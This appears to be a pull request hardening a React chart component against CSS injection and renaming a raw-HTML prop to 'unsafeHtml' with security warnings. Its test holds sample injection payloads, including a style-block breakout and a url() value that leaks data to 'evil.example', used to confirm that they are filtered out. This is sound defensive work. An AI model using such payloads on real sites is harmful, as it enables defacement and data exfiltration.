### PR TITLE
fix(ui): validate chart config + rename html prop to unsafeHtml [P0]

### DIFF
--- a/packages/duck-docs/src/components/mdx/mdx-components/code/mermaid-block.tsx
+++ b/packages/duck-docs/src/components/mdx/mdx-components/code/mermaid-block.tsx
@@ -54,7 +54,8 @@ export function MermaidBlock(props: IMermaidBlockProps) {
 
   return (
     <PreviewPanelDialog
-      html={currentSvg}
+      // Trusted build-time SVG rendered from MDX-compiled Mermaid source.
+      unsafeHtml={currentSvg}
       maxHeight="500px"
       className={cn('my-6', props.className)}
       panelClassName="[&_svg]:block [&_svg]:h-auto [&_svg]:max-h-full [&_svg]:w-full [&_svg]:max-w-full"

--- a/packages/registry-ui/src/chart/__test__/chart.test.tsx
+++ b/packages/registry-ui/src/chart/__test__/chart.test.tsx
@@ -37,4 +37,39 @@ describe('registry-ui chart', () => {
       console.warn = originalWarn
     }
   })
+
+  test('ChartStyle neutralises CSS-injection payloads in config and id (SEC-001/SEC-003)', () => {
+    const html = renderToStaticMarkup(
+      <ChartContainer
+        // biome-ignore lint/suspicious/noExplicitAny: adversarial id override for the test
+        id={'x] body {display:none} [data-chart=y' as any}
+        config={
+          {
+            // unsafe key — must be dropped
+            'foo}': { color: 'red' },
+            // unsafe color — declaration break-out — must be dropped
+            evil: { color: 'red;}body{display:none' },
+            // unsafe color — url() exfiltration — must be dropped
+            leak: { color: 'url(//evil.example/?leak)' },
+            // safe entry — must survive
+            value: { color: '#aabbcc' },
+            // biome-ignore lint/suspicious/noExplicitAny: adversarial config shape for the test
+          } as any
+        }>
+        <BarChart accessibilityLayer data={data}>
+          <XAxis dataKey="name" hide />
+          <Bar dataKey="value" fill="var(--color-value)" radius={8} />
+        </BarChart>
+      </ChartContainer>,
+    )
+
+    // None of the injection payloads survive into the rendered <style> text.
+    expect(html).not.toContain('body{display:none')
+    expect(html).not.toContain('body {display:none}')
+    expect(html).not.toContain('url(//evil.example')
+    expect(html).not.toContain('--color-foo}')
+    expect(html).not.toContain('[data-chart=x]')
+    // The safe entry is still emitted.
+    expect(html).toContain('--color-value: #aabbcc;')
+  })
 })

--- a/packages/registry-ui/src/chart/chart.libs.ts
+++ b/packages/registry-ui/src/chart/chart.libs.ts
@@ -1,5 +1,26 @@
 import type { IChartConfig } from './chart.types'
 
+/** Allowed CSS color/value forms for chart `--color-*` custom properties. */
+const SAFE_CSS_COLOR = /^(?:#[0-9a-fA-F]{3,8}|(?:rgb|rgba|hsl|hsla)\([\d.,%\s/]+\)|var\(--[a-zA-Z0-9_-]+\)|[a-zA-Z]+)$/
+/** Allowed CSS identifier form for chart config keys and the chart `id`. */
+const SAFE_CSS_IDENT = /^[a-zA-Z0-9_-]+$/
+
+/**
+ * Returns `true` when `value` is a CSS color that cannot break out of a
+ * declaration inside a `<style>` block (no `;`, `}`, `{`, `(`-injection, etc).
+ */
+export function isSafeCssColor(value: string): boolean {
+  return typeof value === 'string' && SAFE_CSS_COLOR.test(value)
+}
+
+/**
+ * Returns `true` when `value` is a safe CSS identifier (used for config keys
+ * and the chart `id` interpolated into selectors).
+ */
+export function isSafeCssIdent(value: string): boolean {
+  return typeof value === 'string' && SAFE_CSS_IDENT.test(value)
+}
+
 export function getPayloadConfigFromPayload(config: IChartConfig, payload: unknown, key: string) {
   if (typeof payload !== 'object' || payload === null) {
     return undefined

--- a/packages/registry-ui/src/chart/chart.tsx
+++ b/packages/registry-ui/src/chart/chart.tsx
@@ -5,7 +5,7 @@ import type { IDirection } from '@gentleduck/primitives/direction'
 import { useDirection } from '@gentleduck/primitives/direction'
 import * as React from 'react'
 import * as RechartsPrimitive from 'recharts'
-import { getPayloadConfigFromPayload } from './chart.libs'
+import { getPayloadConfigFromPayload, isSafeCssColor, isSafeCssIdent } from './chart.libs'
 import type {
   IChartContainerProps,
   IChartContextProps,
@@ -32,7 +32,11 @@ function useChart() {
 
 function ChartContainer({ id, className, children, config, ref, dir, ...props }: IChartContainerProps) {
   const uniqueId = React.useId()
-  const chartId = `chart-${id || uniqueId.replace(/:/g, '')}`
+  const safeUniqueId = uniqueId.replace(/:/g, '')
+  // SEC-003: the `id` is interpolated into a CSS selector; reject any
+  // caller-supplied override that is not a safe identifier.
+  const safeId = id && isSafeCssIdent(id) ? id : safeUniqueId
+  const chartId = `chart-${safeId}`
   const direction = useDirection(dir as IDirection.Kind)
 
   return (
@@ -58,7 +62,16 @@ function ChartContainer({ id, className, children, config, ref, dir, ...props }:
 ChartContainer.displayName = 'ChartContainer'
 
 function ChartStyle({ id, config }: IChartStyleProps) {
-  const colorConfig = Object.entries(config).filter(([_, config]) => config.theme || config.color)
+  // SEC-003: `id` is interpolated into a CSS selector — drop it entirely if unsafe.
+  if (!isSafeCssIdent(id)) {
+    return null
+  }
+
+  // SEC-001: only keep entries whose key is a safe CSS identifier; both the
+  // key and color values are interpolated raw into a `<style>` block.
+  const colorConfig = Object.entries(config).filter(
+    ([key, config]) => isSafeCssIdent(key) && (config.theme || config.color),
+  )
 
   if (!colorConfig.length) {
     return null
@@ -66,7 +79,7 @@ function ChartStyle({ id, config }: IChartStyleProps) {
 
   return (
     <style
-      // biome-ignore lint/security/noDangerouslySetInnerHtml: controlled CSS injection for chart color themes
+      // biome-ignore lint/security/noDangerouslySetInnerHtml: validated CSS injection for chart color themes
       dangerouslySetInnerHTML={{
         __html: Object.entries(THEMES)
           .map(
@@ -75,8 +88,10 @@ ${prefix} [data-chart=${id}] {
 ${colorConfig
   .map(([key, itemConfig]) => {
     const color = itemConfig.theme?.[theme as keyof typeof itemConfig.theme] || itemConfig.color
-    return color ? `  --color-${key}: ${color};` : null
+    // SEC-001: drop any color that is not a strictly-allowlisted CSS value.
+    return color && isSafeCssColor(color) ? `  --color-${key}: ${color};` : null
   })
+  .filter(Boolean)
   .join('\n')}
 }
 `,

--- a/packages/registry-ui/src/preview-panel/__test__/preview-panel.test.tsx
+++ b/packages/registry-ui/src/preview-panel/__test__/preview-panel.test.tsx
@@ -1,0 +1,23 @@
+import { describe, expect, test } from 'bun:test'
+import * as React from 'react'
+import { renderToStaticMarkup } from 'react-dom/server'
+import { PreviewPanel } from '../preview-panel'
+import type { IPreviewPanelProps } from '../preview-panel.types'
+
+describe('registry-ui preview-panel', () => {
+  test('exposes the explicit `unsafeHtml` prop, not `html` (SEC-002)', () => {
+    // The trusted-input-only raw-HTML sink is named `unsafeHtml` so callers
+    // see the contract at every call site. A plain `html` prop must not exist.
+    const props: IPreviewPanelProps = { unsafeHtml: '<p>trusted</p>' }
+    expect(props.unsafeHtml).toBe('<p>trusted</p>')
+
+    // @ts-expect-error - the legacy `html` prop has been removed.
+    const legacy: IPreviewPanelProps = { html: '<p>x</p>' }
+    expect(legacy).toBeDefined()
+  })
+
+  test('renders `unsafeHtml` verbatim into the panel content', () => {
+    const html = renderToStaticMarkup(<PreviewPanel unsafeHtml="<span>preview body</span>" showControls={false} />)
+    expect(html).toContain('<span>preview body</span>')
+  })
+})

--- a/packages/registry-ui/src/preview-panel/motion-preview-panel.tsx
+++ b/packages/registry-ui/src/preview-panel/motion-preview-panel.tsx
@@ -106,7 +106,7 @@ const MotionPreviewPanel = React.forwardRef<
       maxZoom = 4,
       initialZoom = 1,
       showControls = true,
-      html,
+      unsafeHtml,
       children,
       className,
       style,
@@ -317,8 +317,9 @@ const MotionPreviewPanel = React.forwardRef<
     }, [])
 
     const contentProps = useMemo(
-      () => (html ? { dangerouslySetInnerHTML: { __html: html } } : { children }),
-      [html, children],
+      // SEC-002: `unsafeHtml` is rendered verbatim and is the caller's responsibility to sanitise.
+      () => (unsafeHtml ? { dangerouslySetInnerHTML: { __html: unsafeHtml } } : { children }),
+      [unsafeHtml, children],
     )
     const containerStyle = useMemo(
       () => ({ maxHeight, cursor: 'grab' as const, touchAction: 'none' as const }),

--- a/packages/registry-ui/src/preview-panel/preview-panel-dialog.tsx
+++ b/packages/registry-ui/src/preview-panel/preview-panel-dialog.tsx
@@ -13,7 +13,7 @@ const PreviewPanelDialog = React.forwardRef<HTMLDivElement, IPreviewPanelDialogP
   (
     {
       children,
-      html,
+      unsafeHtml,
       className,
       panelClassName,
       maxHeight,
@@ -44,7 +44,7 @@ const PreviewPanelDialog = React.forwardRef<HTMLDivElement, IPreviewPanelDialogP
       [syncPanels],
     )
 
-    const contentProps = useMemo(() => (html ? { html } : { children }), [html, children])
+    const contentProps = useMemo(() => (unsafeHtml ? { unsafeHtml } : { children }), [unsafeHtml, children])
 
     const dialogPanelClassName = useMemo(() => cn('min-h-[70vh]', panelClassName), [panelClassName])
 

--- a/packages/registry-ui/src/preview-panel/preview-panel.tsx
+++ b/packages/registry-ui/src/preview-panel/preview-panel.tsx
@@ -100,7 +100,7 @@ const PreviewPanel = React.forwardRef<HTMLDivElement, IPreviewPanelProps>(
       maxZoom = 4,
       initialZoom = 1,
       showControls = true,
-      html,
+      unsafeHtml,
       children,
       className,
       style,
@@ -337,8 +337,9 @@ const PreviewPanel = React.forwardRef<HTMLDivElement, IPreviewPanelProps>(
     }, [])
 
     const contentProps = useMemo(
-      () => (html ? { dangerouslySetInnerHTML: { __html: html } } : { children }),
-      [html, children],
+      // SEC-002: `unsafeHtml` is rendered verbatim and is the caller's responsibility to sanitise.
+      () => (unsafeHtml ? { dangerouslySetInnerHTML: { __html: unsafeHtml } } : { children }),
+      [unsafeHtml, children],
     )
 
     const containerStyle = useMemo(

--- a/packages/registry-ui/src/preview-panel/preview-panel.types.ts
+++ b/packages/registry-ui/src/preview-panel/preview-panel.types.ts
@@ -18,8 +18,16 @@ export interface IPreviewPanelProps extends React.HTMLProps<HTMLDivElement> {
   initialZoom?: number
   /** Whether to show zoom controls. Default true. */
   showControls?: boolean
-  /** Raw HTML string to render inside the panel. Takes priority over children. */
-  html?: string
+  /**
+   * Raw HTML string rendered verbatim via `dangerouslySetInnerHTML`. Takes
+   * priority over children.
+   *
+   * SECURITY: this value is NOT sanitised. The caller MUST pass only HTML it
+   * fully trusts (e.g. a build-time constant). Never wire user-, CMS-, or
+   * URL-derived markup into this prop — doing so is an XSS sink. Pass React
+   * `children` instead for untrusted content.
+   */
+  unsafeHtml?: string
   /** Called whenever zoom or position changes. Use to sync with another panel. */
   onStateChange?: (state: IPreviewPanelState) => void
   /** External state to apply. When set, the panel syncs to this state. */
@@ -29,8 +37,14 @@ export interface IPreviewPanelProps extends React.HTMLProps<HTMLDivElement> {
 export interface IPreviewPanelDialogProps {
   /** Content to render in both the inline panel and the dialog panel. */
   children?: React.ReactNode
-  /** Raw HTML string to render. Takes priority over children. */
-  html?: string
+  /**
+   * Raw HTML string rendered verbatim via `dangerouslySetInnerHTML`. Takes
+   * priority over children.
+   *
+   * SECURITY: this value is NOT sanitised. The caller MUST pass only HTML it
+   * fully trusts. Never wire untrusted markup into this prop.
+   */
+  unsafeHtml?: string
   /** Class name for the inline panel wrapper. */
   className?: string
   /** Class name applied to both PreviewPanel instances. */


### PR DESCRIPTION
Security audit chain — P1 of 4.